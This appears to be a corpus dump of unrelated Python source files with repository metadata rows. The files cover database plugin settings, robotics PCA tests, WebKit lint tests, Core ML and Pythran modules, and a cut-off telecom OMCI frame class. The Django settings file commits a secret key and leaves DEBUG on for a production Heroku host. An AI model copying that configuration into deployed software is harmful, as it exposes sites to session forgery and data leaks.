def test_offsetsky_reduction(exposure_collection_real_data, calib_collection_real_data,
config, config_file_offsetsky, testing_refcat_server):
# TODO: Implement more rigorous test in future
reduction = create_from_file(config_file_offsetsky,
exposure_collection=exposure_collection_real_data,
calib_collection=calib_collection_real_data,
config=config)
reduction.run(makeplots=True)
| 34.159091 | 90 | 0.667332 |
b6efce12a99d6083127bcaaa60e3c2309ab6cea3 | 6,647 | py | Python | model/plugin_configuration.py | arielmorelli/server_core | b34e3b334c5255bd60df0dc68ed16473e5b43ad7 | [
"Apache-2.0"
] | null | null | null | model/plugin_configuration.py | arielmorelli/server_core | b34e3b334c5255bd60df0dc68ed16473e5b43ad7 | [
"Apache-2.0"
] | null | null | null | model/plugin_configuration.py | arielmorelli/server_core | b34e3b334c5255bd60df0dc68ed16473e5b43ad7 | [
"Apache-2.0"
] | null | null | null | from configuration import ConfigurationSetting
from library import Library
from . import get_one
from sqlalchemy.sql.expression import bindparam
from sqlalchemy import and_, insert, update, delete
import logging
class PluginConfiguration(ConfigurationSetting):
""" Plugin is a ConfigurationSetting with specific behavior. """
def get_saved_values(self, _db, library_short_name, plugin_name):
""" Get saved values from a plugin.
Args:
_db (object): a db instace
library_short_name (str): library short name.
plugin_name (str): plugin name.
Returns:
dict: dict representing the plugin config.
"""
try:
library = self._get_library_from_short_name(_db, library_short_name)
except Exception as ex:
logging.warning("Cannot find library. Ex: %s", ex)
raise
try:
return self._get_saved_values(_db, library, plugin_name)
except Exception as ex:
logging.error("Cannot save values. Ex: %s", ex)
raise Exception("Something went wrong while quering saved plugin values.")
def save_values(self, _db, library_short_name, plugin_name, new_values):
""" Save values of a plugin.
Args:
_db (object): a db instace
library_short_name (str): library short name.
plugin_name (str): plugin name.
new_values (dict): key/value pair to save in DB
"""
try:
library = self._get_library_from_short_name(_db, library_short_name)
except Exception as ex:
logging.warning("Cannot find library. Ex: %s", ex)
raise Exception("Cannot find the library")
try:
fields_from_db = self._get_saved_values(_db, library, plugin_name)
except Exception as ex:
logging.warning("Cannot get plugin saved values. Ex: %s", ex)
raise
to_insert = [] # Expect list of {"lib_id": <lib_id>, "key": <target_key>, "value": <value>}
to_update = [] # Expect list of {"lib_id": <lib_id>, "key": <target_key>, "value": <value>}
to_delete = [] # Expect list of {"lib_id": <lib_id>, "key": <target_key>}
for key, value in new_values.items():
if key == None:
continue
elif not fields_from_db.get(key) and value is not None:
to_insert.append(
{ "lib_id": library.id, "target_key": plugin_name+"."+key, "value": value}
)
elif fields_from_db.get(key) and value is None:
to_delete.append(
{ "lib_id": library.id, "target_key": plugin_name+"."+key}
)
elif ( fields_from_db.get(key) and
fields_from_db[key] != value ):
to_update.append(
{ "lib_id": library.id, "target_key": plugin_name+"."+key, "value": value}
)
no_longer_exist_keys = set(fields_from_db.keys()) - set(new_values.keys())
to_delete = to_delete + [{ "lib_id": library.id, "target_key": plugin_name+"."+key}
for key in no_longer_exist_keys]
try:
self._perform_db_operations(_db, to_insert, to_update, to_delete)
except Exception as ex:
logging.error("Cannot save plugin values. Ex: %s", ex)
raise
def _get_saved_values(self, _db, library, plugin_name):
""" Get raw values from a plugin without formating it
Args:
_db (object): a db instace
library_short_name (str): library short name.
plugin_name (str): plugin name.
Returns:
dict: key/value pair with plugin values
"""
response = _db.query(ConfigurationSetting).filter(
ConfigurationSetting.library_id == library.id,
ConfigurationSetting.key.startswith(plugin_name)
).all()
values = {}
for entry in response:
values[entry.key[len(plugin_name)+1:]] = entry._value
return values
def _get_library_from_short_name(self, _db, library_short_name):
""" Get a library object by this short name
Args:
_db (object): a db instace
library_short_name (str): library short name.
Returns:
Library: a library instace
"""
library = get_one(
_db, Library, short_name=library_short_name,
)
if not library:
raise Exception("Library not found")
return library
def _perform_db_operations(self, _db, to_insert, to_update, to_delete):
""" Execute insert, update and delete operations
Args:
_db (object): a db instace
to_insert (list): items to be inserted in DB
to_update (list): items to be updated in DB
to_delete (list): items to be deleted in DB
"""
if not to_insert and not to_update and not to_delete:
return
try:
# Insert
if to_insert:
insert_stmt = insert(PluginConfiguration).values(
external_integration_id=None,
library_id=bindparam("lib_id"),
key=bindparam("target_key"),
value=bindparam("value")
)
_db.execute(insert_stmt, to_insert)
# Update
if to_update:
update_stmt = update(PluginConfiguration).where(
and_(
PluginConfiguration.library_id == bindparam("lib_id"),
PluginConfiguration.key == bindparam("target_key"),
)
).values(value=bindparam("value"))
_db.execute(update_stmt, to_update)
# Delete
if to_delete:
delete_stmt = delete(PluginConfiguration).where(
and_(
PluginConfiguration.library_id == bindparam("lib_id"),
PluginConfiguration.key == bindparam("target_key"),
)
)
_db.execute(delete_stmt, to_delete)
except Exception as err:
logging.error("Cannot perform db operations. Er: %s", err)
raise
try:
_db.commit()
except Exception as ex:
logging.error("Error while commiting plugin changes. Ex: %s", ex)
_db.rollback()
raise
| 36.521978 | 99 | 0.559801 |
41abf7fc1409d0ae00bd739cd4b8a3f489d83069 | 5,874 | py | Python | src/grasp_synergy/test/test_synergy.py | aprotyas/grasp-synergy | 23d0f7747a8a95b74017a7b9452155eec860f5db | [
"BSD-3-Clause"
] | null | null | null | src/grasp_synergy/test/test_synergy.py | aprotyas/grasp-synergy | 23d0f7747a8a95b74017a7b9452155eec860f5db | [
"BSD-3-Clause"
] | null | null | null | src/grasp_synergy/test/test_synergy.py | aprotyas/grasp-synergy | 23d0f7747a8a95b74017a7b9452155eec860f5db | [
"BSD-3-Clause"
] | null | null | null | import unittest
import os
import rosbag
import numpy as np
from grasp_synergy.grasp_synergy import GraspSynergy
"""
Author: Felix Duvallet <felixd@gmail.com>
"""
class TestCase(unittest.TestCase):
def setUp(self):
(_, self.messages, _) = zip(*self.data)
self.synergy = GraspSynergy()
pass
@classmethod
def setUpClass(cls):
fpath = os.path.join(os.path.dirname(__file__), 'data', 'allegro.bag')
bag = rosbag.Bag(fpath)
topics = ['/allegroHand_0/joint_states']
cls.data = list(bag.read_messages(topics))
bag.close()
pass
def test_constructor(self):
self.assertIsNotNone(self.synergy)
self.assertEqual(0, self.synergy._D)
self.assertEqual(0, self.synergy._N)
def test_trained_with_data(self):
self.assertFalse(self.synergy.trained)
joints = np.random.random((25, 5))
self.synergy.fit_joint_values(joints)
self.assertTrue(self.synergy.trained)
def test_trained_no_data(self):
joints = np.zeros((10, 0))
self.synergy.fit_joint_values(joints)
self.assertFalse(self.synergy.trained)
def test_fit_joint_values(self):
joints = np.random.random((25, 5))
ret = self.synergy.fit_joint_values(joints)
self.assertTrue(ret)
self.assertEqual(5, self.synergy._D)
self.assertEqual(25, self.synergy._N)
self.assertEqual(5, len(self.synergy._pca.components_))
def test_fit_joint_values_bad_type(self):
joints = [[1, 2, 3], [4, 5, 6]]
with self.assertRaisesRegexp(AssertionError, 'Must have'):
self.synergy.fit_joint_values(joints)
def test_fit_joint_values_empty(self):
# Interesting fact about numpy arrays: len(joints) is 10 while
# joints.size is 0.
joints = np.zeros((10, 0))
ret = self.synergy.fit_joint_values(joints)
self.assertFalse(ret)
self.assertEqual(0, self.synergy._D)
self.assertEqual(0, self.synergy._N)
self.assertFalse(self.synergy.trained)
def test_fit_joint_messages(self):
ret = self.synergy.fit_joint_state_messages(self.messages)
self.assertTrue(ret)
self.assertEqual(16, self.synergy._D)
self.assertEqual(82, self.synergy._N)
self.assertEqual(16, len(self.synergy._pca.components_))
def test_fit_joint_messages_empty(self):
messages = [] # List is okay.
ret = self.synergy.fit_joint_state_messages(messages)
self.assertFalse(ret)
self.assertEqual(0, self.synergy._D)
self.assertEqual(0, self.synergy._N)
self.assertFalse(self.synergy.trained)
def test_fit_bag_file(self):
fpath = os.path.join(os.path.dirname(__file__), 'data', 'allegro.bag')
ret = self.synergy.fit_bag_file(fpath)
self.assertTrue(ret)
self.assertEqual(16, self.synergy._D)
self.assertEqual(82, self.synergy._N)
self.assertEqual(16, len(self.synergy._pca.components_))
def test_bag_file_nonexistent(self):
ret = self.synergy.fit_bag_file('/not/a/file')
self.assertFalse(ret)
self.assertEqual(0, self.synergy._D)
self.assertEqual(0, self.synergy._N)
self.assertFalse(self.synergy.trained)
def test_compute_grasp_no_data(self):
ret = self.synergy.compute_grasp([0, 1, 3])
self.assertIsNone(ret)
def test_compute_grasp_shape(self):
self.synergy.fit_joint_state_messages(self.messages)
ret = self.synergy.compute_grasp([1.0])
self.assertIsNotNone(ret)
self.assertEqual((16,), ret.shape)
def test_compute_grasp_zero_alphas(self):
self.synergy.fit_joint_state_messages(self.messages)
ret = self.synergy.compute_grasp([])
ref = self.synergy._pca.mean_
np.testing.assert_array_almost_equal(ref, ret)
def test_compute_grasp_sum_alphas(self):
self.synergy.fit_joint_state_messages(self.messages)
ret = self.synergy.compute_grasp([1.0, 1.0])
ref = (self.synergy._pca.components_[0] +
self.synergy._pca.components_[1] + self.synergy._pca.mean_)
np.testing.assert_array_almost_equal(ref, ret)
def test_compute_grasp_many_alphas(self):
# Make sure we can pass in a large vector of coefficients without
# failing.
self.synergy.fit_joint_state_messages(self.messages)
alphas = np.ones((100,))
ret = self.synergy.compute_grasp(alphas)
ref = (np.sum(self.synergy._pca.components_, axis=0) +
self.synergy._pca.mean_)
np.testing.assert_array_almost_equal(ref, ret)
def test_component_ranges_0(self):
self.synergy.fit_joint_state_messages(self.messages)
(ret_min, ret_max) = self.synergy.synergy_range(0)
self.assertAlmostEqual(-1.12507406, ret_min, places=4)
self.assertAlmostEqual(1.18130298, ret_max, places=4)
def test_component_ranges_1(self):
self.synergy.fit_joint_state_messages(self.messages)
(ret_min, ret_max) = self.synergy.synergy_range(1)
self.assertAlmostEqual(-0.41370870, ret_min, places=4)
self.assertAlmostEqual(0.4547809556, ret_max, places=4)
def test_component_ranges_untrained(self): # try before training.
(ret_min, ret_max) = self.synergy.synergy_range(1)
self.assertEqual(0, ret_min)
self.assertEqual(0, ret_max)
def test_component_ranges_negative(self):
(ret_min, ret_max) = self.synergy.synergy_range(-1)
self.assertEqual(0, ret_min)
self.assertEqual(0, ret_max)
def test_component_ranges_too_big(self):
(ret_min, ret_max) = self.synergy.synergy_range(100)
self.assertEqual(0, ret_min)
self.assertAlmostEqual(0, ret_max)
if __name__ == '__main__':
unittest.main()
| 35.6 | 78 | 0.669901 |
942bf7150ae77713eedae8e0e8e5284beb197c4a | 528 | py | Python | setup.py | sanAkdam/chime | 1adbddbdddcdc2669086dee60d1bfb2f97535cff | [
"BSD-3-Clause"
] | 8 | 2015-02-05T22:12:41.000Z | 2015-05-15T16:15:14.000Z | setup.py | sanAkdam/chime | 1adbddbdddcdc2669086dee60d1bfb2f97535cff | [
"BSD-3-Clause"
] | 168 | 2015-02-02T23:02:52.000Z | 2015-05-15T21:54:07.000Z | setup.py | codeforamerica/bizarro-cms | 1adbddbdddcdc2669086dee60d1bfb2f97535cff | [
"BSD-3-Clause"
] | 5 | 2016-11-20T15:51:32.000Z | 2021-04-16T09:44:08.000Z | from setuptools import setup
setup(
name='Chime',
version='0.0.0',
url='https://github.com/chimecms/chime',
author='Code for America',
description='Hashing out some ideas about Git, Jekyll, language, and content management',
packages=['chime', 'chime.httpd', 'chime.publish', 'chime.instantiation'],
package_data={
'chime': ['templates/*.html', 'templates/macros/*.html', 'templates/includes/*.html']
},
install_requires=[],
entry_points=dict(
console_scripts=[]
)
)
| 29.333333 | 93 | 0.645833 |
0958ba3a5d2b81acba6617e4399b75a9aed8fed6 | 474 | py | Python | algorithm/Experience.py | YangJW73/PokerDQN | ff3a771f843d4b5ea6e073fd91138b2a744e97ea | [
"MIT"
] | 1 | 2018-03-02T00:49:31.000Z | 2018-03-02T00:49:31.000Z | algorithm/Experience.py | YangJW73/PokerDQN | ff3a771f843d4b5ea6e073fd91138b2a744e97ea | [
"MIT"
] | null | null | null | algorithm/Experience.py | YangJW73/PokerDQN | ff3a771f843d4b5ea6e073fd91138b2a744e97ea | [
"MIT"
] | null | null | null | #!/bin/python
class Experience:
def __init__(self, turn, info_feat, action_feat, reward, next_info_feat, next_available_action_feats):
self.turn = turn
self.info_feat = info_feat
self.action_feat = action_feat
self.reward = reward
self.next_info_feat = next_info_feat
self.next_available_action_feats = next_available_action_feats | 47.4 | 106 | 0.582278 |
d48f9d84c1fa64fa58a492ca5892fb3761fb26c6 | 4,347 | py | Python | third_party/WebKit/Tools/Scripts/webkitpy/style/checkers/test_expectations_unittest.py | wenfeifei/miniblink49 | 2ed562ff70130485148d94b0e5f4c343da0c2ba4 | [
"Apache-2.0"
] | 5,964 | 2016-09-27T03:46:29.000Z | 2022-03-31T16:25:27.000Z | third_party/WebKit/Tools/Scripts/webkitpy/style/checkers/test_expectations_unittest.py | w4454962/miniblink49 | b294b6eacb3333659bf7b94d670d96edeeba14c0 | [
"Apache-2.0"
] | 459 | 2016-09-29T00:51:38.000Z | 2022-03-07T14:37:46.000Z | third_party/WebKit/Tools/Scripts/webkitpy/style/checkers/test_expectations_unittest.py | w4454962/miniblink49 | b294b6eacb3333659bf7b94d670d96edeeba14c0 | [
"Apache-2.0"
] | 1,006 | 2016-09-27T05:17:27.000Z | 2022-03-30T02:46:51.000Z | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import sys
import unittest
from test_expectations import TestExpectationsChecker
from webkitpy.common.host_mock import MockHost
class ErrorCollector(object):
"""An error handler class for unit tests."""
def __init__(self):
self._errors = []
self.turned_off_filtering = False
def turn_off_line_filtering(self):
self.turned_off_filtering = True
def __call__(self, lineno, category, confidence, message):
self._errors.append('%s [%s] [%d]' % (message, category, confidence))
return True
def get_errors(self):
return ''.join(self._errors)
def reset_errors(self):
self._errors = []
self.turned_off_filtering = False
class TestExpectationsTestCase(unittest.TestCase):
"""TestCase for test_expectations.py"""
def setUp(self):
self._error_collector = ErrorCollector()
self._test_file = 'passes/text.html'
def assert_lines_lint(self, lines, should_pass, expected_output=None):
self._error_collector.reset_errors()
host = MockHost()
checker = TestExpectationsChecker('test/TestExpectations',
self._error_collector, host=host)
# We should have a valid port, but override it with a test port so we
# can check the lines.
self.assertIsNotNone(checker._port_obj)
checker._port_obj = host.port_factory.get('test-mac-leopard')
checker.check_test_expectations(expectations_str='\n'.join(lines),
tests=[self._test_file])
checker.check_tabs(lines)
if should_pass:
self.assertEqual('', self._error_collector.get_errors())
elif expected_output:
self.assertEqual(expected_output, self._error_collector.get_errors())
else:
self.assertNotEquals('', self._error_collector.get_errors())
# Note that a patch might change a line that introduces errors elsewhere, but we
# don't want to lint the whole file (it can unfairly punish patches for pre-existing errors).
# We rely on a separate lint-webkitpy step on the bots to keep the whole file okay.
# FIXME: See https://bugs.webkit.org/show_bug.cgi?id=104712 .
self.assertFalse(self._error_collector.turned_off_filtering)
def test_valid_expectations(self):
self.assert_lines_lint(["crbug.com/1234 [ Mac ] passes/text.html [ Pass Failure ]"], should_pass=True)
def test_invalid_expectations(self):
self.assert_lines_lint(["Bug(me) passes/text.html [ Give Up]"], should_pass=False)
def test_tab(self):
self.assert_lines_lint(["\twebkit.org/b/1 passes/text.html [ Pass ]"], should_pass=False, expected_output="Line contains tab character. [whitespace/tab] [5]")
| 42.617647 | 167 | 0.710835 |
10985db8b686f3114db6b5ac276bcd5310e07426 | 3,764 | py | Python | project_lifeline/settings.py | vix993/project-lifeline | 273bdad6e4d31178995654bbfced9d9e9e665c12 | [
"MIT"
] | 1 | 2021-04-13T14:58:37.000Z | 2021-04-13T14:58:37.000Z | project_lifeline/settings.py | vix993/project-lifeline | 273bdad6e4d31178995654bbfced9d9e9e665c12 | [
"MIT"
] | null | null | null | project_lifeline/settings.py | vix993/project-lifeline | 273bdad6e4d31178995654bbfced9d9e9e665c12 | [
"MIT"
] | null | null | null | """
Django settings for project_lifeline project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ch_2uku2qk%7@9u@(6*jl(%%-g8wpb4*61cxee@974)+=lx#84'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['project-lifeline.herokuapp.com', 'localhost']
# Application definition
INSTALLED_APPS = [
'rest_framework',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'survivor'
]
MIDDLEWARE = [
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'project_lifeline.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'project_lifeline.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': str(BASE_DIR / 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
PROJECT_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
STATIC_URL = '/static/'
# Extra lookup directories for collectstatic to find static files
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, 'static'),
)
# Add configuration for static files storage using whitenoise
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
import dj_database_url
prod_db = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(prod_db)
| 27.474453 | 91 | 0.714134 |
ed81547d1fca640de21e420e2ea160b65d13bc0e | 1,739 | py | Python | coremltools/__init__.py | Vijayrajsinh/Core-ML | b103f513cfd42cdf5b60f6261448d1ce667f590b | [
"BSD-3-Clause"
] | 1 | 2019-02-08T08:45:32.000Z | 2019-02-08T08:45:32.000Z | coremltools/__init__.py | Vijayrajsinh/Core-ML | b103f513cfd42cdf5b60f6261448d1ce667f590b | [
"BSD-3-Clause"
] | null | null | null | coremltools/__init__.py | Vijayrajsinh/Core-ML | b103f513cfd42cdf5b60f6261448d1ce667f590b | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2017, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
"""
Core ML is an Apple framework which allows developers to simply and easily integrate machine
learning (ML) models into apps running on Apple devices (including iOS, watchOS, macOS, and
tvOS). Core ML introduces a public file format (.mlmodel) for a broad set of ML methods
including deep neural networks (both convolutional and recurrent), tree ensembles with boosting,
and generalized linear models. Models in this format can be directly integrated into apps
through Xcode.
Core MLTools in a python package for creating, examining, and testing models in the .mlmodel
format. In particular, it can be used to:
* Convert existing models to .mlmodel format from popular machine learning tools including:
Keras, Caffe, scikit-learn, libsvm, and XGBoost.
* Express models in .mlmodel format through a simple API.
* Make predictions with an .mlmodel (on select platforms for testing purposes).
For more information: http://developer.apple.com/documentation/coreml
"""
# This is the basic Core ML specification format understood by iOS 11.0
SPECIFICATION_VERSION = 1
# New versions for iOS 11.2 features. Models which use these features should have these
# versions, but models created from this coremltools which do not use the features can
# still have the basic version.
_MINIMUM_CUSTOM_LAYER_SPEC_VERSION = 2
_MINIMUM_FP16_SPEC_VERSION = 2
# expose sub packages as directories
from . import converters
from . import proto
from . import models
from .models import utils
from ._scripts.converter import _main
| 42.414634 | 96 | 0.787809 |
bfa1ff92f29f99ed3e74dbc381230c001d89709c | 5,090 | py | Python | pythran/types/conversion.py | davidbrochart/pythran | 24b6c8650fe99791a4091cbdc2c24686e86aa67c | [
"BSD-3-Clause"
] | 1,647 | 2015-01-13T01:45:38.000Z | 2022-03-28T01:23:41.000Z | pythran/types/conversion.py | davidbrochart/pythran | 24b6c8650fe99791a4091cbdc2c24686e86aa67c | [
"BSD-3-Clause"
] | 1,116 | 2015-01-01T09:52:05.000Z | 2022-03-18T21:06:40.000Z | pythran/types/conversion.py | davidbrochart/pythran | 24b6c8650fe99791a4091cbdc2c24686e86aa67c | [
"BSD-3-Clause"
] | 180 | 2015-02-12T02:47:28.000Z | 2022-03-14T10:28:18.000Z | """ Module to convert Python type to Pythonic type. """
from numpy import int8, int16, int32, int64, intp, intc
from numpy import uint8, uint16, uint32, uint64, uintp, uintc
from numpy import float64, float32, complex64, complex128
import numpy
from pythran.typing import List, Dict, Set, Tuple, NDArray, Pointer, Fun
PYTYPE_TO_CTYPE_TABLE = {
numpy.uint: 'npy_uint',
#
complex: 'std::complex<double>',
bool: 'bool',
int: 'long',
float: 'double',
str: 'pythonic::types::str',
slice: 'pythonic::types::slice',
type(None): 'pythonic::types::none_type',
intc: 'int',
intp: 'npy_intp',
int64: 'npy_int64',
int32: 'npy_int32',
int16: 'npy_int16',
int8: 'npy_int8',
uintc: 'unsigned',
uintp: 'npy_uintp',
uint64: 'npy_uint64',
uint32: 'npy_uint32',
uint16: 'npy_uint16',
uint8: 'npy_uint8',
float64: 'double',
float32: 'float',
complex128: 'std::complex<double>',
complex64: 'std::complex<float>',
}
try:
from numpy import float128, complex256
PYTYPE_TO_CTYPE_TABLE[float128] = 'long double'
PYTYPE_TO_CTYPE_TABLE[complex256] = 'std::complex<long double>'
except ImportError:
pass
TYPE_TO_SUFFIX = {
int: "L",
}
def pytype_to_ctype(t):
""" Python -> pythonic type binding. """
if isinstance(t, List):
return 'pythonic::types::list<{0}>'.format(
pytype_to_ctype(t.__args__[0])
)
elif isinstance(t, Set):
return 'pythonic::types::set<{0}>'.format(
pytype_to_ctype(t.__args__[0])
)
elif isinstance(t, Dict):
tkey, tvalue = t.__args__
return 'pythonic::types::dict<{0},{1}>'.format(pytype_to_ctype(tkey),
pytype_to_ctype(tvalue))
elif isinstance(t, Tuple):
return 'decltype(pythonic::types::make_tuple({0}))'.format(
", ".join('std::declval<{}>()'.format(pytype_to_ctype(p))
for p in t.__args__)
)
elif isinstance(t, NDArray):
dtype = pytype_to_ctype(t.__args__[0])
ndim = len(t.__args__) - 1
shapes = ','.join(('long'
if s.stop == -1 or s.stop is None
else 'std::integral_constant<long, {}>'.format(
s.stop)
) for s in t.__args__[1:])
pshape = 'pythonic::types::pshape<{0}>'.format(shapes)
arr = 'pythonic::types::ndarray<{0},{1}>'.format(
dtype, pshape)
if t.__args__[1].start == -1:
return 'pythonic::types::numpy_texpr<{0}>'.format(arr)
elif any(s.step is not None and s.step < 0 for s in t.__args__[1:]):
slices = ", ".join(['pythonic::types::normalized_slice'] * ndim)
return 'pythonic::types::numpy_gexpr<{0},{1}>'.format(arr, slices)
else:
return arr
elif isinstance(t, Pointer):
return 'pythonic::types::pointer<{0}>'.format(
pytype_to_ctype(t.__args__[0])
)
elif isinstance(t, Fun):
return 'pythonic::types::cfun<{0}({1})>'.format(
pytype_to_ctype(t.__args__[-1]),
", ".join(pytype_to_ctype(arg) for arg in t.__args__[:-1]),
)
elif t in PYTYPE_TO_CTYPE_TABLE:
return PYTYPE_TO_CTYPE_TABLE[t]
else:
raise NotImplementedError("{0}:{1}".format(type(t), t))
def pytype_to_pretty_type(t):
""" Python -> docstring type. """
if isinstance(t, List):
return '{0} list'.format(pytype_to_pretty_type(t.__args__[0]))
elif isinstance(t, Set):
return '{0} set'.format(pytype_to_pretty_type(t.__args__[0]))
elif isinstance(t, Dict):
tkey, tvalue = t.__args__
return '{0}:{1} dict'.format(pytype_to_pretty_type(tkey),
pytype_to_pretty_type(tvalue))
elif isinstance(t, Tuple):
return '({0})'.format(
", ".join(pytype_to_pretty_type(p) for p in t.__args__)
)
elif isinstance(t, NDArray):
dtype = pytype_to_pretty_type(t.__args__[0])
ndim = len(t.__args__) - 1
arr = '{0}[{1}]'.format(
dtype,
','.join(':' if s.stop in (-1, None) else str(s.stop)
for s in t.__args__[1:]))
# it's a transpose!
if t.__args__[1].start == -1:
return '{} order(F)'.format(arr)
elif any(s.step is not None and s.step < 0 for s in t.__args__[1:]):
return '{0}[{1}]'.format(dtype, ','.join(['::'] * ndim))
else:
return arr
elif isinstance(t, Pointer):
dtype = pytype_to_pretty_type(t.__args__[0])
return '{}*'.format(dtype)
elif isinstance(t, Fun):
rtype = pytype_to_pretty_type(t.__args__[-1])
argtypes = [pytype_to_pretty_type(arg) for arg in t.__args__[:-1]]
return '{}({})'.format(rtype, ", ".join(argtypes))
elif t in PYTYPE_TO_CTYPE_TABLE:
return t.__name__
else:
raise NotImplementedError("{0}:{1}".format(type(t), t))
| 36.357143 | 79 | 0.565619 |
1f06e5f5cd5e5322252fd001472a08e5acd9913f | 7,544 | py | Python | voltha/extensions/omci/omci_frame.py | jcsteven/voltha-b1.4.0-fixed | c4f56bc1a4e8e39248c89e8ed9000cfe6bd90f2c | [
"Apache-2.0"
] | null | null | null | voltha/extensions/omci/omci_frame.py | jcsteven/voltha-b1.4.0-fixed | c4f56bc1a4e8e39248c89e8ed9000cfe6bd90f2c | [
"Apache-2.0"
] | 2 | 2021-03-31T18:39:49.000Z | 2022-02-11T03:40:28.000Z | voltha/extensions/omci/omci_frame.py | jcsteven/voltha-b1.4.0-fixed | c4f56bc1a4e8e39248c89e8ed9000cfe6bd90f2c | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from scapy.fields import ByteField, PacketField, IntField
from scapy.fields import ShortField, ConditionalField
from scapy.packet import Packet
from voltha.extensions.omci.omci_defs import FixedLenField
from voltha.extensions.omci.omci_messages import OmciCreate, OmciDelete, \
OmciDeleteResponse, OmciSet, OmciSetResponse, OmciGet, OmciGetResponse, \
OmciGetAllAlarms, OmciGetAllAlarmsResponse, OmciGetAllAlarmsNext, \
OmciMibResetResponse, OmciMibReset, OmciMibUploadNextResponse, \
OmciMibUploadNext, OmciMibUploadResponse, OmciMibUpload, \
OmciGetAllAlarmsNextResponse, OmciAttributeValueChange, \
OmciTestResult, OmciAlarmNotification, \
OmciReboot, OmciRebootResponse, OmciGetNext, OmciGetNextResponse
from voltha.extensions.omci.omci_messages import OmciCreateResponse
class OmciFrame(Packet):
name = "OmciFrame"
fields_desc = [
ShortField("transaction_id", 0),
ByteField("message_type", None),
ByteField("omci", 0x0a),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciCreate), align=36),
lambda pkt: pkt.message_type == OmciCreate.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciCreateResponse), align=36),
lambda pkt: pkt.message_type == OmciCreateResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciDelete), align=36),
